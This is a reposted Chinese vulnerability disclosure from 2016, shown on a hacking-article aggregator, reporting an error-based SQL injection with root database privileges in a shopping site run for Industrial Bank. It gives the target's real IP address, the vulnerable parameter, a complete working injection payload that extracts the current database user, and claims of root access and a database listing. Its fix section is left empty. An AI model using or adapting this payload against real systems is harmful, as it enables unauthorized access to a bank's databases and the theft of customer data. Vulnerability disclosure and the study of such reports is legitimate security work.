记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

兴业银行某重要站点SQL注入(ROOT权限)

2016-07-12 21:15

目标:兴业银行生活商城http://115.28.28.109/

检测发现以下地方存在SQL注入:(注入参数name,报错注入)

code 区域
http://115.28.28.109/api/ad.php?id=12&catid=&name=



Payload:

code 区域
http://115.28.28.109/api/ad.php?id=12&catid=&name=' AND (SELECT 4107 FROM(SELECT COUNT(*),CONCAT(0x716b7a6a71,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,54)),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kCXG' LIKE 'kCXG

漏洞证明:

1、当前数据库用户,root

user.jpg



2、所有数据库

db.jpg



银行系统,具体就不深入了~

修复方案:

请多指教~


知识来源: www.wooyun.org/bugs/wooyun-2016-0213601

阅读:160986 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“兴业银行某重要站点SQL注入(ROOT权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁